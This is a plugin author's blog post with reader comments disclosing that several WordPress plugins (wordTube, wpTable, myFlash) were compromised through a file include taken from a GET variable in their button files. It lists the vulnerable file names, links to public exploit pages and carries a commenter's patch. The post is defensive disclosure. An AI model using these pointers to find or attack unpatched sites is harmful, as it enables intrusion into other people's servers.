BIG security issue !

My plugins get hacked and in the same way like myGallery

http://weblogtoolscollection.com/archives/2007/04/30/please-update-mygallery-plugin/

I update all plugins (except NextGEN Gallery, which is safe), please update now to the latest version !

Please check your server log if you see external access to :

  • wptable-button.php
  • wordtube-button.php
  • myflash-button.php

Then I recommend you to delete this file, the TinyMCE button will not work, but it’s better for the moment.
I analyse at the moment what the hell they get already for information from my site. I hope this is not a bigger problem, but for the next days this page can be offline from time to time…

Sorry for all the problems, I’m not aware of this when I program the plugins, I do my best that this never happend again.

Here are the hacks :

http://www.milw0rm.com/exploits/3825

http://www.milw0rm.com/exploits/3824

http://www.milw0rm.com/exploits/3828

Advertisements
Tagged ,

31 thoughts on “BIG security issue !

  1. Luis says:

    Alex,

    Is there anything to do to make NextGen Gallery safer, that is the only one I’m using so far.

    Thanks,

    Luis

  2. alakhnor says:

    Thanks for the warning Alex. So, as I understand you just change the way path goes through buttons to fix it (ie, the very top of the php) ?

  3. alex.rabe says:

    I removed the inlude via the GET variable, this idea i take form a other plugin, I never feel it’s a good way , but I never supose that it’s a possible backdoor.

    for my new plugin I already changed it, and I hope and pray that i did it in a better way..

    I’m terrrible shocked that this happend…

  4. alakhnor says:

    This sounded strange to me when I went through the code. It should have ring a bell. No sweat! It’ll be soon past 😉

  5. daveslocombe says:

    Our site has been hacked – i beleive through wordtube – i started a new thread on this topic. Damn stressful, just lost our business website and email.

  6. gregg says:

    Our site has also jsut been hacked though wordtube…

    I am installing a fresh wordpress install now…

  7. serge says:

    Hey I’ve been hacked too.
    I’ve solved the problem :
    in wordtube-button.php
    – remove if $_GET…
    – and put :
    $wppath = preg_replace(‘`^(.*)(/wp-content/(.*))`’,’$1′,$_SERVER[‘SCRIPT_FILENAME’]);

    in wordtube.php line 313 to 315
    function wpt_buttonscript() {
    window.open(“‘.WORDTUBE_URLPATH.’wordtube-button.php”, “SelectVideo”, “width=440,height=220,scrollbars=no”);
    }

  8. iSightseeing says:

    […] ich gerade per Email erfahren habe (Danke an Majoran und Alexx), gibt es ein Sicherheitsloch im WordPress PlugIn […]

  9. gregg says:

    Do I need to do this change to the code even if I have updated to the latest version of the plugin…

    My site has had all pages deleted, random empty posts scattered throughout and a few Hacked By messages…

    bastards

  10. alakhnor says:

    Version 1.44 is safe. You shouldn’t need additional code with it. In fact, the change in it is similar to what Serge has given.

  11. […] wordTube meminta agar plugins wordTube segera di update dan juga untuk menetralisir bug tersebut http://alexrabe.de/?p=110 sekaligus vendor mengusulkan untuk menghapus file […]

  12. raniya says:

    My website got hacked for two days I am been crying…..my host says I should take the pluggin altogheter…I just don’t know what to do.

  13. Bailey says:

    Backup, backup, backup………… people, you can’t be running BUSINESS websites without keeping frequent backups. It’s not your hosts responsibility, it is YOUR responsibility. That’s part of running a website!!!

    Now that said… if the plug-in is crackable… UNINSTALL IT. Really, it is as simple as that. Never hang your hat on a plug-in. WordPress is your main tool, do your best to “hack around” a solution in the meantime until patches are released by Alex.

    But Alex — DO NOT freak out about this. You have been doing your best here. People accept a certain liability when they install a 3rd-party plug-in… it might be insecure. It might be opening them up to having their site destroyed. This is the risk we undertake. 😉 Kudos to you for being concerned about it, but, don’t beat yourself up over it. We users accept the liability when we modify the base WordPress. Cracks happen. 😉

  14. Ted says:

    As a web host with a server that got compromised by this, I’d like to say thanks for getting on this so very quickly!

  15. Ruben says:

    My website also got hacked and my server has been down a few times pretty hard woth a sever load that went from 0.5 to 80 in 20 seconds as soon as the server was rebooted. They had full Root access on the dedicated server and where misusing it pretty well…

    Please note that disabling the Wordtube Plug-in may not be enough, delete the plug-in to make sure they can’t request or find the wordtube-button.php by using the inurl: search on Google.

    Pitty I can’t use the plug-in any more I loved it and we used it on a nearly daily basis…

  16. Ruben says:

    Oh and Alex, the payoff of your website is: Learning by doing. I guess the only one who can be blamed are the idiots that are misusing a mistake made by somebody else. We’re all just learning by doing. My lesson? Keep focused on backupping, I had some luck this time.

  17. […] Luckily nothing was deleted and after some trouble I was able to get my page working again.  For those of you using the wordtube plugin: Upgrade now (if you haven’t done that already)! Read this. […]

  18. SS says:

    Found two large files in the wordtube directory but nothing else wrong with the website – as far as I can see. Maybe they got bored by the tie they got to me.

    Phew!

  19. […] sondern die Fehler, die für die Angriffe gesorgt haben: Programmierfehler in den Plugins Wordtube und myGallery. Wer diese verwendet, sollte schleunigst auf die aktuellste Version […]

  20. […] Parade trouvée ( mise à jour du plugin avec la version 1.44 et effacement d’un fichier : voir ici ) […]

  21. Hacked of London says:

    These are really basic XSS attacks. Maybe you should learn to program before you release stuff in future.

  22. alex.rabe says:

    See my motto… learning by doing
    You can trust me , this happend not a second time 🙂

  23. boris says:

    hab das sicherheitsproblem am eigenen leib.. ehm, server erfahren und wollte etwas zum thema erzählen.. aber ich sehe ja: das problem ist bekannt und gelöst. bestens 🙂

  24. […] Ich möchte es so sagen: stellt bitte sicher, dass die Plugins eurer WordPress-Installationen auf dem neusten Stand sind. Sofern ihr sie überhaupt benutzt. Aber auch sonst, denn sonst passieren doofe Dinge… […]

  25. […] seems like one file of the wordtube plugin was open to GET exploits. i removed the file now, changed all passwords (ftp, sql, wordpress, mint) and hope that i won’t recieve another suspicious email. if you use the same plugin, do so as well (instructions are here). […]

  26. wilsen says:

    Hi Alex,

    things like that happen! I appreciate that you acted that quick and that you mind your plug-in. But “Hacked of London” is right. Because of that I want to recommend this book:

    http://www.amazon.de/PHP-Sicherheit-PHP-MySQL-Webanwendungen-sicher-programmieren/dp/3898644502/ref=cm_taf_title_featured?ie=UTF8&tag=tellafriend-20

    This book really kicks ass! And if you don’t already know it, it will help you to develop more of these wonderful plug-ins for us 😉

  27. […] but this is also a growing risk that hackers and bad guys review again the code and find another security problem. I fear the day when my plugin is listed on milworm… I do my best to review my own code, but […]

  28. […] DoS-Attacken gegen einen Brasilianischen Server benutzt. Das betroffene PlugIn war WordTube von Alex Rabe. Anfang Mai wurde auch schon auf einigen Sites und Blogs über dieses Problem berichtet. Durch […]

  29. KC says:

    I’m seeing today in the logs that someone (a botnet?) is guessing that I have this plugin installed (and some others too). I notice that this happens time to time — they check on whatever wordpress installations they can find and see if someone hasn’t updated.

  30. alex.rabe says:

    This is ongoing since May, also my page receive still 100-200 attemps each day…

Comments are closed.

%d bloggers like this: